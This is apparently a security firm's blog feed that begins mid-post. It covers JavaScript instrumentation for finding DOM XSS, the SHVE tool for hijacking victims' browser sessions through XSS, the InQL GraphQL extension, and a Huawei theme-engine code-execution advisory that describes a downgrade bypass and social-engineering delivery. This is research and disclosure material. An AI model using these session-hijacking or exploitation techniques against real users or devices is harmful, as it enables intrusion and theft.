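    owner[name] = new Proxy(original, {
        apply(target, thisArg, args) {
            onCall(name, args);
            return Reflect.apply(target, thisArg, args);
        },
    });
    // Return a function that restores the original method.
    return () => {
        owner[name] = original;
    };
}

// Stand-in for a browser object such as window or document.
const fakeWindow = {
    encode(value) {
        return `<${value}>`;
    },
};

const calls = [];
const unhook = hookMethod(fakeWindow, "encode", (fn, args) => {
    calls.push({ fn, args });
});

const result = fakeWindow.encode("x");
console.log(result, calls);
```

In a real page you would pass something like window or document as the owner, and call console.trace() inside the callback to find the caller.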

Step 1: Hooking native JavaScript

Build your own Extension

While you can use one of many web extensions that will add arbitrary JavaScript to the page, I don’t recommend it. These extensions are often buggy, have race conditions and are difficult to develop in. In most cases, I find it easier to just write my own extension. Don’t be daunted, it is really easy. You only need two files and I already made them for you here.

To load the code in Firefox go to about:debugging#/runtime/this-firefox in the URL bar, click Load Temporary Add-on and navigate to the manifest.json file in the top directory of the extension.

For Chrome, go to chrome://extensions/, enable developer mode on the right side and click Load unpacked.

The extension should show up in the addon list, where you can quickly enable or disable it. When enabled, the script.js file will load in every web page. The following lines of code log all input to document.write.

	/*********************************************************
	 ***  Your code goes goes here to run in pages scope  ***
	 *********************************************************/

	// example code to dump all arguments to document.write
	document.write = new Proxy(document.write, {
		apply: function(_func, _doc, args) {
			console.group(`[**] document.write.apply arguments`);
				for (const arg of args) {
					console.dir(arg);
				}
			console.groupEnd();
			return Reflect.apply(...arguments);
		}
	});

Replace those lines of code with whatever you want. Your code will run in every page and frame before the page has the opportunity to run its own code.

How it works

The boilerplate uses the manifest file to register a content script. The manifest tells the browser that the content script should run in every frame and before the page loads. Content scripts do not have direct access to the scope of the page they are loaded into but they do have direct access to the DOM. So the boilerplate code just adds a new script into the page’s DOM. A CSP can prohibit this, so the extension checks that it worked. If a CSP does block you, just disable the CSP with browser configs, a web extension or an intercepting proxy.

Notice that the instrumentation code ultimately ends up with the same privileges as the website. So your code will be subject to the same restrictions as the page, such as the same origin policy.
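The injection step described above can be sketched roughly as follows. This is my own simplified version, not the boilerplate’s actual code: injectIntoPage is a hypothetical name, the document is passed in as a parameter so the function can be exercised outside a browser, and the CSP check is left out.

```javascript
// Content-script side: runs in the extension's isolated scope but shares
// the DOM with the page, so it can add a <script> element to it.
function injectIntoPage(doc, pageFunction) {
    const script = doc.createElement("script");
    // Serialize the function and wrap it in an IIFE, so that it is
    // evaluated in the page's own scope rather than the content script's.
    script.textContent = `(${pageFunction.toString()})();`;
    // Append to the root element, which typically exists even before
    // <head> and <body> have been parsed.
    doc.documentElement.appendChild(script);
    // An inline script runs as soon as it is inserted, so the element
    // can be removed right away.
    script.remove();
    return script.textContent;
}

// In a real content script the call would look like this:
// injectIntoPage(document, function () {
//     /* hooks that must run in the page's scope */
// });
```

Everything inside the injected function has to be self-contained, since it is serialized to text and loses access to variables from the content script.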

Async and Races

A quick word of warning. The above content script will give you first access to the only JavaScript thread. The website itself can’t run any JavaScript until you give up that thread. Try it out, see if you can make a website that runs document.write before the boilerplate has it hooked.

First access is a huge advantage, you get to poison the environment that the website is about to use. Don’t give up your advantage until you are done poisoning. This means avoiding the use of async functions.

This is why many web extensions intended to inject user JavaScript into a page are buggy. Retrieving user configuration in a web extension is done using an async call. While the async is looking up the user config, the page is running its code and potentially has already executed the sink you wanted to hook. This is why Eval Villain is only available on Firefox. Firefox has a unique API that can register the content script with the user configuration.
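The race is easy to reproduce without a browser. In this small simulation, the page objects, sink and the helper names are invented for the example, and the await stands in for an asynchronous configuration lookup. The synchronous hook sees the page’s call, while the hook installed after the await misses it.

```javascript
// Install a logging hook on target.sink.
function installHook(target, log) {
    const original = target.sink;
    target.sink = function (...args) {
        log.push(args[0]);
        return original.apply(this, args);
    };
}

// Same hook, but installed only after an asynchronous step.
async function installHookAfterAwait(target, log) {
    await Promise.resolve(); // stand-in for an async config lookup
    installHook(target, log);
}

// Case 1: hook synchronously, then let the "page" run.
const syncPage = { sink: (value) => value };
const syncLog = [];
installHook(syncPage, syncLog);
syncPage.sink("payload"); // page code: the call is logged

// Case 2: the thread is given up at the await, so the page runs first.
const asyncPage = { sink: (value) => value };
const asyncLog = [];
installHookAfterAwait(asyncPage, asyncLog);
asyncPage.sink("payload"); // page code: the hook is not installed yet

console.log(syncLog.length, asyncLog.length);
```

The second hook does get installed eventually, but only after the call it was meant to observe has already happened.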

Eval Villain

It is very rare that I run into a “Step 1” situation that can’t be solved with Eval Villain. Eval Villain is just a content script that hooks sinks and searches input for sources. You can configure almost any native JavaScript functionality to be a sink. Sources include user-configured strings or regular expressions, URL parameters, local storage, cookies, URL fragment and window name. These sources are recursively decoded for important substrings. Let’s look at the same page of the example above, this time with Eval Villain in its default configuration.

Notice this page is being loaded from a local file://. The source code is seen below.

<script>
let x = (new URLSearchParams(location.search)).get('x');
x = atob(x);
x = atob(x);
x = JSON.parse(x);
x = x['a'];
x = decodeURI(x);
x = atob(x);
document.write(`Welcome Back ${x}!!!`);
</script>

Even though the page has no web requests, Eval Villain still successfully hooks the user configured sink document.write before the page uses it. There is no race condition.

Also notice that Eval Villain is not just displaying the input of document.write. It correctly highlighted the injection point. The URL parameter x contained an encoded string that hit the sink document.write. Eval Villain figured this out by recursively decoding the URL parameters. Since the parameter was decoded, an encoder function is provided to the user. You can right click, copy message and paste it into the console. Using the encoder function lets you quickly try payloads. Below shows the encoder function being used to inject a marquee tag into the page.

If you read the previous sections, you know how this all works. Eval Villain is just using a content script to inject its JavaScript into a page. Anything it does, you can do in your own content script. Additionally, you can now use Eval Villain’s source code as your boilerplate code and customize its features for your particular technical challenge.
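To give a feel for what recursive decoding involves, here is a small sketch of the idea. It is not Eval Villain’s implementation: the decoder list, the three-character minimum and the names findDecoding and collectStrings are my own assumptions. It tries a few decoders at each level until some decoded value shows up inside the sink’s input.

```javascript
// Decoders to try at every level; each returns the strings found in its input.
const decoders = {
    base64: (s) => [atob(s)],
    uri: (s) => [decodeURIComponent(s)],
    json: (s) => collectStrings(JSON.parse(s)),
};

// Gather every string nested anywhere inside a parsed JSON value.
function collectStrings(value) {
    if (typeof value === "string") return [value];
    if (value && typeof value === "object") {
        return Object.values(value).flatMap(collectStrings);
    }
    return [];
}

// Return the chain of decoders that turns `source` into a substring of
// `sinkInput`, or null if no chain of at most `maxDepth` steps does.
function findDecoding(source, sinkInput, maxDepth = 6, path = []) {
    if (source.length >= 3 && sinkInput.includes(source)) return path;
    if (path.length >= maxDepth) return null;
    for (const [name, decode] of Object.entries(decoders)) {
        let decoded;
        try {
            decoded = decode(source);
        } catch {
            continue; // not valid input for this decoder
        }
        for (const candidate of decoded) {
            if (candidate === source) continue; // decoder made no progress
            const hit = findDecoding(candidate, sinkInput, maxDepth, [...path, name]);
            if (hit) return hit;
        }
    }
    return null;
}

// Build a parameter the same way the example page expects to decode it.
const x = btoa(btoa(JSON.stringify({ a: encodeURI(btoa("admin")) })));
const chain = findDecoding(x, "Welcome Back admin!!!");
console.log(chain);
```

Knowing the chain of decoders is also what makes an encoder possible: applying the inverse operations in reverse order turns a payload back into a value for the x parameter.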

Step 1.5: A Quick Tip

So let’s say you used “Step 1” to get a console.trace from an interesting native function. Maybe a URL parameter hit your decodeURI sink and now you’re tracing back to the URL parsing function. There is a mistake I regularly make in this situation and I want you to do better. When you get a trace, don’t start reading code yet!

Modern web applications often have polyfills and other cruft at the top of the console.trace. For example, the stack trace I get on a Google search results page starts with functions iAa, ka, c, ng, getAll. Don’t get tunnel vision and start reading ka when getAll is obviously what you want. When you look at getAll, don’t read the source! Continue to scan, notice that getAll is a method and its siblings are get, set, size, keys, entries and all the other methods listed in the URLSearchParams documentation. We just found multiple custom URL parsers, re-implemented in minified code without actually reading the code. “Scan” as much as you can, don’t start reading code deeply until you find the right spot or scanning has failed you.

Step 2: Hooking non-native code

Instrumenting native code didn’t result in vulnerabilities. Now you want to instrument the non-native implementation itself. Let me illustrate this with an example.

Let’s say you discovered a URL parser function that returns an object named url_params. This object has all the key value pairs for the URL parameters. We want to monitor access to that object. Doing so could give us a nice list of every URL parameter associated to a URL. We may discover new parameters this way and unlock hidden functionality in the site.

Doing this in JavaScript is not hard. In 16 lines of code we can have a well organized, unique list of URL parameters associated to the appropriate page and saved for easy access in localStorage. We just need to figure out how to paste our code right into the URL parser.

function parseURL() {
    // URL parsing code
    // url_params = {"key": "value", "q": "bar" ...

    // The code you want to add in
    url_params = new Proxy(url_params, {
        __testit: function(a) {
            const loc = 'my_secret_space';
            const urls = JSON.parse(localStorage[loc]||"{}");
            const href = location.protocol + '//' + location.host + location.pathname;
            const s = new Set(urls[href]);
            if (!s.has(a)) {
                urls[href] = Array.from(s.add(a));
                localStorage.setItem(loc, JSON.stringify(urls));
            }
        },
        get: function(a,b,c) {
            this.__testit(b);
            return Reflect.get(...arguments);
        }
    });
    // End of your code

    return url_params;
}

Chrome’s dev tools will let you type your own code into the JavaScript source but I don’t recommend it. At least for me, the added code will disappear on page load. Additionally, it is not easy to manage any instrumentation points this way.

I have a better solution and it’s built into Firefox and Chrome. Take your instrumentation code, surround it with parentheses, and add && false to the end. The above code becomes this:

(url_params = new Proxy(url_params, {
    __testit: function(a) {
        const loc = 'my_secret_space';
        const urls = JSON.parse(localStorage[loc]||"{}");
        const href = location.protocol + '//' + location.host + location.pathname;
        const s = new Set(urls[href]);
        if (!s.has(a)) {
            urls[href] = Array.from(s.add(a));
            localStorage.setItem(loc, JSON.stringify(urls));
        }
    },
    get: function(a,b,c) {
        this.__testit(b);
        return Reflect.get(...arguments);
    }
}) && false

Now right click the line number where you want to add your code, click “conditional breakpoint”.

Paste your code in there. Due to the && false the condition will never be true, so you won’t ever get a breakpoint. The browser will still execute our code, in the scope of the function where we inserted the breakpoint. There are no race conditions and the breakpoint will continue to live. It will show up in new tabs when you open the developer tools. You can quickly disable individual instrumentation scripts by just disabling the associated breakpoint. Or disable all of them by disabling breakpoints or closing the developer tools window.
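If you want to convince yourself of how the condition behaves, the following sketch imitates it outside the debugger. A direct eval stands in for the browser evaluating the breakpoint condition in the function’s scope. The parseURL body, the accessed set and the query string are made up for the demonstration.

```javascript
// The text you would paste as the breakpoint condition.
const condition = `(url_params = new Proxy(url_params, {
    get(target, key, receiver) {
        accessed.add(String(key));
        return Reflect.get(target, key, receiver);
    }
})) && false`;

const accessed = new Set();

function parseURL(query) {
    let url_params = Object.fromEntries(new URLSearchParams(query));
    // The debugger would evaluate the condition here, in this scope.
    const shouldPause = eval(condition);
    if (shouldPause) {
        throw new Error("never reached: the condition always ends in false");
    }
    return url_params;
}

const params = parseURL("?q=bar&debug=1");
params.q;       // a parameter the page really uses
params.missing; // a parameter the page looks for but was not supplied

console.log([...accessed]);
```

The side effect (swapping url_params for a Proxy) happens even though the expression as a whole is false, which is why the page never pauses. Parameters the code asks for but that are absent from the URL, like missing here, are recorded as well, and those are often the interesting ones.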

I used this particular example to show just how far you can go. The instrumented code will save URL parameters, per site, to a local storage entry. At any given page you can auto-populate all known URL parameters into the URL bar by pasting the following code into the console.

(() => {
const url = location.protocol + '//' + location.host + location.pathname;
const params = JSON.parse(localStorage.getItem("my_secret_space"))[url];
location.href = url + '?' + params.flatMap( x => `${x}=${x}`).join('&');
})()

If you use this often, you can even put the code in a bookmarklet.

Combining Native and Non-Native Instrumentation

Nothing says we can’t use native and non-native functions at the same time. You can use a content script to implement big fancy codebases. Export that functionality to the global scope and then use it in a conditional breakpoint.

This brings us to the latest feature of Eval Villain. Your conditional can make use of Eval Villain’s recursive decoding feature. In the pop-up menu click “configure” and go to the “globals” section. Ensure the “sourcer” line is enabled and click save.

I find myself enabling/disabling this feature often, so there is a second “enable” flag in the popup menu itself. It’s in the “enable/disable” menu as “User Sources”. This causes Eval Villain to export the evSourcer function to the global name scope. This will add any arbitrary object to the list of recursively decoded sources.

As can be seen, the first argument is what you name the source. The second is the actual object you want to search for in sinks. Unless there is a custom encoding that Eval Villain does not understand, you can just put this in raw. There is an optional third argument that will cause the sourcer to console.debug every time it’s invoked. This function returns false, so you can use it as a conditional breakpoint anywhere. For example, you can add this as a conditional breakpoint that only runs in the post message handler of interest, when receiving messages from a particular origin, as a means of finding out whether any part of a message will hit a DOM XSS sink. Using this in the right place can alleviate SOP restrictions placed on your instrumentation code.

Just like the evSourcer there is an evSinker. I rarely use this, so there is no “enable/disable” entry for this in the popup menu. It accepts a sink name and a list of arguments and just acts like your own sink. It also returns false so it can easily be used in conditional breakpoints.

Conclusion

Writing your own instrumentation is a powerful skill for vulnerability research. Sometimes, it only takes a couple of lines of JavaScript to tame a giant gully codebase. By knowing how this works, you can have better insight into what tools like Eval Villain and DOM Invader can and can’t do. Whenever necessary, you can also adapt your own code when a tool comes up short.

Introducing Session Hijacking Visual Exploitation (SHVE): An Innovative Open-Source Tool for XSS Exploitation

2023-08-31T00:00:00+02:00

Greetings, folks! Today, we’re thrilled to introduce you to our latest tool: Session Hijacking Visual Exploitation, or SHVE. This open-source tool, now available on our GitHub, offers a novel way to hijack a victim’s browser sessions, utilizing them as a visual proxy after hooking via an XSS or a malicious webpage. While some exploitation frameworks, such as BeEF, do provide hooking features, they don’t allow remote visual interactions.

SHVE’s interaction with a victim’s browser in the security context of the user relies on a comprehensive design incorporating multiple elements. These components, each fulfilling a specific function, form a complex, interconnected system that allows a precise and controlled session hijacking. Let’s take a closer look at each of them:

VictimServer: This component serves the malicious JavaScript. Furthermore, it establishes a WebSocket connection to the hooked browsers, facilitating the transmission of commands from the server to the victim’s browser.
AttackerServer: This is the connection point for the attacker client. It supplies all the necessary information to the attacker, such as the details of the different hooked sessions.
Proxy: When the client enters Visual or Interactive mode, it connects to this proxy. The proxy, in turn, uses functionalities provided by the VictimServer to conduct all requests through the hooked browser.

The tool comes with two distinctive modes - Visual and Interactive - for versatile usage.

Visual Mode: The tool provides a real-time view of the victim’s activities. This is particularly useful when exploiting an XSS, as it allows the attacker to witness the victim’s interactions that otherwise might be impossible to observe. For instance, if a victim accesses a real-time chat that isn’t stored for later review, the attacker could see this live interaction.
Interactive Mode: This mode provides a visual gateway to any specified web application. Since the operations are carried out using the victim’s security context via the hooked browser, detection from the server-side becomes significantly more challenging. Unlike typical XSS or CORS misconfigurations exploitation, there’s no need to steal information like Cookies or Local Storage. Instead, the tool uses XHR requests, ensuring CSRF tokens are automatically sent, as both victim and attacker view the same HTML.

Getting Started

We’ve tried to make the installation process as straightforward as possible. You’ll need to have Node.js and npm installed on your system. After cloning our repository, navigate to the server and client directories to install their respective dependencies. Start the server and client, follow the initial setup steps, and you’re ready to go! For the full installation guide, please refer to the README file.

We’ve recorded a video showcasing these modes and demonstrating how to exploit XSS and CORS misconfigurations using one of PortSwigger’s Web Security Academy labs. Here is how SHVE works:

[Video: SHVE demonstration]

We look forward to your contributions and insights, and can’t wait to see how you’ll use SHVE in your red team engagements. Happy hacking!

Thanks to Michele Orru and Giuseppe Trotta for their early-stage feedback and ideas.

InQL v5: A Technical Deep Dive

2023-08-17T00:00:00+02:00

We’re thrilled to pull back the curtain on the latest iteration of our widely-used Burp Suite extension - InQL. Version 5 introduces significant enhancements and upgrades, solidifying its place as an indispensable tool for penetration testers and bug bounty hunters.

Introduction
The Journey So Far: From Jython to Kotlin
- The Challenges of Converting a Burp Extension Into Kotlin
- Sidestepping the need for stickytape
Introducing GQLSpection: The Core of InQL v5.x
New Features
The Future of InQL and GraphQL Security
InQL: A Great Project for Students and Contributors
Conclusion

Introduction

The cybersecurity landscape is in a state of constant flux. As GraphQL adoption surges, the demand for an adaptable, resilient testing tool has become paramount. As leaders in GraphQL security, Doyensec is proud to reveal the most recent iteration of our open-source testing tool - InQL v5.x. This isn’t merely an update; it’s a comprehensive revamp designed to augment your GraphQL testing abilities.

The Journey So Far: From Jython to Kotlin

Our journey with InQL started on the Jython platform. However, as time went by, we began to experience the limitations of Jython - chiefly, its lack of support for Python 3, which made it increasingly difficult to find compatible tooling and libraries. It was clear a transition was needed. After careful consideration, we chose Kotlin. Not only is it compatible with Java (which Burp is written in), but it also offers robustness, flexibility, and a thriving developer community.

The Challenges of Converting a Burp Extension Into Kotlin

We opted to include the entire Jython runtime (over 40 MB) within the Kotlin extension to overcome the challenges of reusing the existing Jython code. Although it wasn’t the ideal solution, this approach allowed us to launch the extension as Kotlin, initiate the Jython interpreter, and delegate execution to the older Jython code.

class BurpExtender: IBurpExtender, IExtensionStateListener, BurpExtension {

    private var legacyApi: IBurpExtenderCallbacks? = null
    private var montoya: MontoyaApi? = null

    private var jython: PythonInterpreter? = null
    private var pythonPlugin: PyObject? = null

    // Legacy API gets instantiated first
    override fun registerExtenderCallbacks(callbacks: IBurpExtenderCallbacks) {

        // Save legacy API for the functionality that still relies on it
        legacyApi = callbacks

        // Start embedded Python interpreter session (Jython)
        jython = PythonInterpreter()
    }

    // Montoya API gets instantiated second
    override fun initialize(montoyaApi: MontoyaApi) {
        // The new Montoya API should be used for all of the new functionality in InQL
        montoya = montoyaApi

        // Set the name of the extension
        montoya!!.extension().setName("InQL")

        // Instantiate the legacy Python plugin
        pythonPlugin = legacyPythonPlugin()

        // Pass execution to legacy Python code
        pythonPlugin!!.invoke("registerExtenderCallbacks")
    }

    private fun legacyPythonPlugin(): PyObject {
        // Make sure UTF-8 is used by default
        jython!!.exec("import sys; reload(sys); sys.setdefaultencoding('UTF8')")

        // Pass callbacks received from Burp to Python plugin as a global variable
        jython!!.set("callbacks", legacyApi)
        jython!!.set("montoya", montoya)

        // Instantiate legacy Python plugin
        jython!!.exec("from inql.extender import BurpExtenderPython")
        val legacyPlugin: PyObject = jython!!.eval("BurpExtenderPython(callbacks, montoya)")

        // Delete global after it has been consumed
        jython!!.exec("del callbacks, montoya")

        return legacyPlugin
    }
}

Sidestepping the need for stickytape

Our switch to Kotlin also solved another problem. Jython extensions in Burp Suite are typically a single .py file, but the complexity of InQL necessitates a multi-file layout. Previously, we used the stickytape library to compress the Python code into a single file. However, stickytape introduced subtle bugs and inhibited access to static files. By making InQL a Kotlin extension, we can now bundle all files into a JAR and access them correctly.

Introducing GQLSpection: The Core of InQL v5.x

A significant milestone in our transition journey involved refactoring the core portion of InQL that handles GraphQL schema parsing. The result is GQLSpection - a standalone library compatible with Python 2/3 and Jython, featuring a convenient CLI interface. We’ve included all GraphQL code examples from the GraphQL specification in our test cases, ensuring comprehensive coverage.

As an added advantage, it also replaces the standalone and CLI modes of the previous InQL version, which were removed to streamline our code base.

New Features

Our clients rely heavily on cutting-edge technologies. As such, we frequently have the opportunity to engage with real-world GraphQL deployments in many of our projects. This rich exposure has allowed us to understand the challenges InQL users face and the requirements they have, enabling us to decide which features to implement. In response to these insights, we’ve introduced several significant features in InQL v5.0 to support more effective and efficient audits and investigations.

Points of Interest

One standout feature in this version is ‘Points of Interest’. Powered by GQLSpection and with the initial implementation contributed by @schoobydrew, this is essentially a keyword scan equipped with several customizable presets.

The Points of Interest scan proves exceptionally useful when analyzing extensive schemas with over 50 queries/mutations and thousands of fields. It produces reports in both human-readable text and JSON format, providing a high-level overview of the vast schemas often found in modern apps, and aiding pentesters in swiftly identifying sensitive data or dangerous functionality within the schema.
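To give a feel for what a keyword scan over a schema involves, here is a minimal Python sketch. It is not GQLSpection's actual implementation or API: the `PRESETS` dictionary, the `scan_points_of_interest` function, and the flattened "type name to field names" schema shape are all assumptions made purely for illustration.

```python
import json
import re

# Hypothetical presets: category name -> keywords to look for (illustrative only).
PRESETS = {
    "auth": ["password", "token", "secret"],
    "pii": ["email", "ssn", "phone"],
}


def scan_points_of_interest(schema, presets=PRESETS):
    """Return {category: ["Type.field", ...]} for field names matching a keyword.

    `schema` is assumed to be a plain mapping of type name -> list of field names.
    """
    report = {}
    for category, keywords in presets.items():
        # One case-insensitive pattern per category.
        pattern = re.compile("|".join(re.escape(k) for k in keywords), re.IGNORECASE)
        hits = [
            f"{type_name}.{field}"
            for type_name, fields in schema.items()
            for field in fields
            if pattern.search(field)
        ]
        if hits:
            report[category] = hits
    return report


if __name__ == "__main__":
    demo_schema = {
        "Query": ["user", "resetPasswordStatus"],
        "User": ["id", "email", "apiToken"],
    }
    # Emit the report as JSON, one of the two output formats mentioned above.
    print(json.dumps(scan_points_of_interest(demo_schema), indent=2))
```

Even a naive substring match like this narrows thousands of fields down to a short list worth reading by hand, which is the point of the feature.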

Improved Logging

One of my frustrations with earlier versions of the tool was the lack of useful error messages when the parser broke on real-world schemas. So, I introduced configurable logging. This, coupled with the fact that parsing functionality is now handled by GQLSpection, has made InQL v5.0 much more reliable and user-friendly.

In-line Annotations

Another important addition to InQL is annotations. Prior to this, InQL only generated the bare minimum query, necessitating the use of other tools to deduce the correct input format, expected values, etc. However, with the addition of inline comments populated with content from ‘description’ fields from the GraphQL schema or type annotations, InQL v5.0 has become much more of a standalone tool.
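As a rough illustration of the idea (not InQL's actual generator), the following Python sketch renders a query in which schema descriptions and argument types appear as GraphQL `#` comments. The `render_annotated_query` function and the shape of the `field` dictionary, including its `placeholder` key, are hypothetical.

```python
def render_annotated_query(field):
    """Render a GraphQL query for `field`, with descriptions as inline `#` comments.

    `field` is a hypothetical dict: name, optional description, optional args
    (each with name, type, placeholder, optional description), and a selection list.
    """
    lines = ["query {"]
    if field.get("description"):
        lines.append(f"  # {field['description']}")
    args = field.get("args", [])
    if args:
        lines.append(f"  {field['name']}(")
        for arg in args:
            if arg.get("description"):
                lines.append(f"    # {arg['description']}")
            # The type annotation is kept as a trailing comment next to the placeholder.
            lines.append(f"    {arg['name']}: {arg['placeholder']}  # type: {arg['type']}")
        lines.append("  ) {")
    else:
        lines.append(f"  {field['name']} {{")
    for sub in field["selection"]:
        lines.append(f"    {sub}")
    lines.append("  }")
    lines.append("}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(render_annotated_query({
        "name": "user",
        "description": "Look up a user",
        "args": [{"name": "id", "type": "ID!", "placeholder": '"1"',
                  "description": "User identifier"}],
        "selection": ["id", "name"],
    }))
```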

There is a trade-off here: while the extensive annotations make InQL more usable, they can sometimes make it hard to comprehend and navigate. We’re looking at solutions for future releases to dynamically limit the display of annotations.

The Future of InQL and GraphQL Security

Our roadmap for InQL is ambitious. Having said that, we are committed to reintroducing features like GraphiQL and Circular Relationship Detection, achieving full feature parity with v4.

As GraphQL continues to grow, ensuring robust security is crucial. InQL’s future involves addressing niche GraphQL features that are often overlooked and improving upon existing pentesting tools. We look forward to sharing more developments with the community.

InQL: A Great Project for Students and Contributors

InQL is not just a tool, it’s a project – a project that invites the contributions of those who are passionate about cybersecurity. We’re actively seeking students and developers who would like to contribute to InQL or do GraphQL-adjacent security research. This is an opportunity to work with experts in GraphQL security, and play a part in shaping the future of InQL.

Conclusion

InQL v5.x is the result of relentless work and an unwavering commitment to enhancing GraphQL security. We urge all pentesters, bug hunters, and cybersecurity enthusiasts working with GraphQL to try out this new release. If you’ve tried InQL in the past and are looking forward to enhancements, v5.0 will not disappoint.

At Doyensec, we’re not just developing a tool, we’re pushing the boundaries of what’s possible in GraphQL security. We invite you to join us on this journey, whether as a user, contributor, or intern.

Happy Hacking!

Huawei Theme Manager Arbitrary Code Execution

2023-07-26T00:00:00+02:00

Back in 2019, we were lucky enough to take part in the newly-launched Huawei mobile bug bounty. For that, we decided to research Huawei’s Themes.

The Themes Manager allows custom themes on EMUI devices to stylize preferences, and the customization of lock screens, wallpapers and icons. Processes capable of making these types of system-wide changes need to have elevated privileges, making them valuable targets for research as well as exploitation.

Background

When it comes to implementing a lockscreen on EMUI, there were three possible engines used:

com.ibimuyu.lockscreen
com.vlife.huawei.emuilock
com.huawei.ucdlockscreen

When installing a theme, the SystemUI.apk verifies the signature of the application attempting to make these changes against a hardcoded list of trusted ones. From what we observed, this process seems to have been implemented properly, with no clear way to bypass the signature checks.

That said, we discovered that when com.huawei.ucdlockscreen was used, it loaded additional classes at runtime. The signatures of these classes were not validated properly, nor were they even checked. This presented an opportunity for us to introduce our own code.

Taking a look at the structure of the theme archive files (.hwt), we see that the unlock screen elements are packaged as follows:

Looking in the unlock directory, we saw the theme.xml file, which is a manifest specifying several properties. These settings included the dynamic unlock engine to use (ucdscreenlock in our case) and an ext.properties file, which allows for dynamic Java code loading from within the theme file.

Let’s look at the file content:

This instructs the dynamic engine (com.huawei.ucdlockscreen) to load com.huawei.nova.ExtensionJarImpl at runtime from the NOVA6LockScreen2019120501.apk. Since this class is not validated, we can introduce our own code to achieve arbitrary code execution. What makes this even more interesting is that our code will run within a process of a highly privileged application (com.huawei.android.thememanager), as shown below.

Utilizing the logcat utility, we can see the dynamic loading process:

This vulnerability was confirmed via direct testing on EMUI 9.1 and 10, but appears to impact the current version of EMUI with some limitations*.

Impact

As previously mentioned, this results in arbitrary code execution using the PID of a highly privileged application. In our testing, exploitation resulted in obtaining around 200 Android and Huawei custom permissions. Among those were the permissions listed below which could result in total compromise of the device’s user data, sensitive system data, any credentials entered into the system and the integrity of the system’s environment.

Considering that the application can send intents requiring the huawei.android.permission.HW_SIGNATURE_OR_SYSTEM permission, we believe it is possible to leverage existing system functionalities to obtain system level code execution. Once achieved, this vulnerability has great potential as part of a rooting chain.

Exploitability

This issue can be reliably exploited with no technical impediments. That said, exploitation requires installing a custom theme, and accomplishing this remotely requires user interaction. We can conceive of several plausible social engineering scenarios, and an attacker could perhaps use a second vulnerability to force the download and installation of themes. Firstly, it is possible to gift themes to other users, so a compromised trusted contact could be leveraged (or spoofed) to convince a victim to accept and install the malicious theme. As an example, the following URL will open the theme gift page: hwt://www.huawei.com/themes?type=33&id=0&from=AAAA&channelId=BBB

Secondly, an attacker could publish a link or QR code pointing to the malicious theme online, then trick a victim into triggering the HwThemeManager application via a deep link using the hwt:// scheme.

To be fair, we must acknowledge that Huawei has a review process in place for new themes and wallpapers, which might limit the use of live themes exploiting this vulnerability.

Partial fix

Huawei released an update for HwThemeManager on February 24, 2022 (internally tracked as HWPSIRT-2019-12158) stating this was resolved. Despite this, we believe the issue was actually resolved in ucdlockscreen.apk (com.huawei.ucdlockscreen version 3 and later).

This is an important distinction, because the latest version of the ucdlockscreen.apk is installed at runtime by HwThemeManager, after applying a theme that requires such an engine. Even on a stock phone (EMUI 9, 10, and the latest 12.0.0.149), an attacker with physical access can uninstall the latest version and install the old vulnerable version, since it is properly signed by Huawei.

Without further mitigations from Huawei, an attacker with physical access to the device can still leverage this vulnerability to gain system privileged access on even the latest devices.

Further discovery

After a few hours of reverse engineering the fix introduced in the latest version of com.huawei.ucdlockscreen (version 4.6), we discovered an additional bypass impacting the EMUI 9.1 release. This issue doesn’t require physical access and can again trigger the same exploitable condition.

During theme loading, the latest version of com.huawei.ucdlockscreen checks for the presence of a /data/themes/0/unlock/ucdscreenlock/error file. Since all of the files within /data/themes/0/ are copied from the provided theme (.hwt) file they can all be attacker-controlled.

This file is used to check the specific version of the theme. An attacker can simply embed an error file referencing an older version, forcing legacy theme support. When doing so, an attacker would also specify a fictitious package name in the ext.properties file. This combination of changes in the malicious .hwt file bypasses all the required checks - making the issue exploitable again on the latest EMUI 9.1, with no physical access required. At the time of our investigation, the other EMUI major versions appeared to implement signature validation mechanisms to mitigate this.

Disclosure

This issue was disclosed on Dec 31, 2019 according to the terms of the Huawei Mobile Bug Bounty, and it was addressed by Huawei as described above. Additional research results were reported to Huawei on Sep 1, 2021. Given the time that has elapsed from the original fix and the fact that we believe the issue is no longer remotely exploitable, we have decided to release the details of the vulnerability.

At the time of writing this post (April 28th, 2023), the issue is still exploitable locally on the latest EMUI (12.0.0.149) by force-loading the vulnerable ucdlockscreen.apk. We have decided not to release the vulnerable version of ucdlockscreen.apk as well as the malicious theme proof-of-concept. While the issue is no longer interesting to attackers, it can still benefit the rooting community and facilitate the work of security researchers in identifying issues within Huawei’s EMUI-based devices.

Conclusions

While the vulnerability is technically interesting by itself, there are two security engineering lessons here. The biggest takeaway is clearly that while relying on signature validation for authenticating software components can be an effective security measure, it must be thoroughly extended to include any dynamically loaded code. That said, it appears Huawei no longer provides bootloader unlock options (see here), making rooting more complicated and expensive. It remains to be seen if this bug is ever used as part of a chain developed by the rooting community.
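To make the first lesson concrete, here is a minimal, language-agnostic sketch in Python of gating dynamically loaded code behind an integrity check. It deliberately swaps real signature verification for a simpler pinned SHA-256 allowlist, and it has nothing to do with how EMUI or Android actually validate packages. The `read_trusted_plugin` function and `UntrustedCodeError` are hypothetical names.

```python
import hashlib
import hmac
from pathlib import Path


class UntrustedCodeError(Exception):
    """Raised when a dynamically loaded file is not on the allowlist."""


def read_trusted_plugin(path, trusted_digests):
    """Return the plugin bytes only if their SHA-256 digest is allowlisted.

    Assumption: `trusted_digests` is an iterable of lowercase hex digests that
    ships inside the (already verified) host application.
    """
    data = Path(path).read_bytes()
    digest = hashlib.sha256(data).hexdigest()
    if not any(hmac.compare_digest(digest, trusted) for trusted in trusted_digests):
        raise UntrustedCodeError(f"{path}: digest {digest} is not trusted")
    # Hand back the exact bytes that were verified, so the caller never
    # re-reads the file from disk after the check (avoids a check/use race).
    return data
```

The important property is that the check sits on the loading path itself: every piece of code pulled in at runtime passes through it, not just the top-level package.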

A secondary engineering lesson is to ensure that when we design backwards compatibility mechanisms, we should assume that there may be older versions that we want to abandon.

This research was made possible by the Huawei Mobile Phone Bug Bounty Program. We want to thank the Huawei PSIRT for their help in handling this issue, the generous bounty and the openness to disclose the details.

Streamlining Websocket Pentesting with wsrepl

2023-07-18T00:00:00+02:00

In an era defined by instant gratification, where life zips by quicker than a teenager’s TikTok scroll, WebSockets have evolved into the heartbeat of web applications. They’re the unsung heroes in data streaming and bilateral communication, serving up everything in real-time, because apparently, waiting is so last century.

